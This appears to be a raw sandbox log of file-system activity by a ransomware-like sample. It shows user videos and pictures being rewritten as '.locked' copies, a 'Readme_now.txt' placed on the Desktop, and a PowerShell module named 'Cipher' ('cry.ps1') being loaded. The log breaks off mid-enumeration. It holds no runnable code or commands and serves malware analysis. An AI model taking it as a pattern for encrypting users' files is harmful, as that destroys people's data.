| Create | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\2v_pWeX_Asqwh\72RtXVsd GkUoN.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\cBLR.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\irWwDU.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\8Q0L9.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\f1-3lJTYUfyM0ni.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\SaLoBZtiA8DzQedEAeR.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Pipe | \device\namedpipe\pshost.131910127767687299.3272.defaultappdomain.powershell | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | type = file_attributes |
|
11 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps | type = file_attributes |
|
190 | |
| Get Info | C:\ | type = file_attributes |
|
185 | |
| Get Info | C:\Windows\system32\wldp.dll | type = file_attributes |
|
104 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\lgwbzpbm.v3x.ps1 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\gtg41s1t.4zc.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
53 | |
| Get Info | C:\Users | type = file_attributes |
|
187 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules | type = file_attributes |
|
8 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | type = file_attributes |
|
11 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | type = file_attributes |
|
12 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | type = file_type |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\ | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
8 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99ac5758-a46a-40cc-bbcd-b892f0dbaad6 | type = file_type |
|
2 | |
| Get Info | C:\ProgramData\Oracle\Java\javapath | type = file_attributes |
|
48 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
48 | |
| Get Info | C:\Windows | type = file_attributes |
|
48 | |
| Get Info | C:\Windows\System32\Wbem | type = file_attributes |
|
43 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\Pester.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\Pester.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\Pester.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\Pester.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\Pester.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1d59afd-fedf-4dad-a2f3-bba3e7eabe5c | type = file_type |
|
2 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_06f90924-1e5d-474b-ba1f-65c4b5caf36a | type = file_type |
|
2 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf1cb9b0-ce8c-44e7-bb1c-52ad1299acf8 | type = file_type |
|
2 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_type |
|
2 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Contacts | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Contacts\Aclviho ASldjfl.contact | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Contacts\asdlfk poopvy.contact | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Contacts\chucu jadnvk.contact | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Contacts\lulcit amkdfe.contact | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Contacts\sikvnb huvuib.contact | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO | type = file_attributes |
|
14 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\2j004a4mmTvDfTy1ebRz.png | type = file_attributes |
|
8 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\AEz4q0q1I-tz.odt | type = file_attributes |
|
